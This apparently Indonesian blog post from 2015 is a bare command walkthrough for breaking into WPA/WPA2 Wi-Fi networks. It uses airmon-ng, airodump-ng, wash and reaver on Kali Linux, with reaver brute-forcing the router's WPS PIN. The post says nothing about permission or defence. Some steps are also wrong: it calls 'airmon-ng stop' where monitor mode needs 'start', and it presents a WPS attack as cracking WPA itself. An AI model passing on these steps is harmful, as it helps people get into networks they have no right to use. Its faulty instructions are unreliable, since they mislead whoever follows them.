Rabu, 04 Maret 2015

Cracking WPA & WPA2 key with Reaver on Kali Linux



Let's start :) 

Open terminal:
airmon-ng
airmon-ng stop [your interface] [My is wlan0]
airodump-ng [your interface] [My is wlan0]

Open new terminal:
wash -i [your interface] [My is wlan0] -c CHANNEL_NUM -C -s

Open new terminal:
reaver -i [your interface] [My is wlan0] -b [BSSID] --fail-wait=360


Tags:

0 Responses to “Cracking WPA & WPA2 key with Reaver on Kali Linux”

Posting Komentar

About

Subscribe

Donec sed odio dui. Duis mollis, est non commodo luctus, nisi erat porttitor ligula, eget lacinia odio. Duis mollis

© 2013 Agoest Koscwahara. All rights reserved.
Designed by SpicyTricks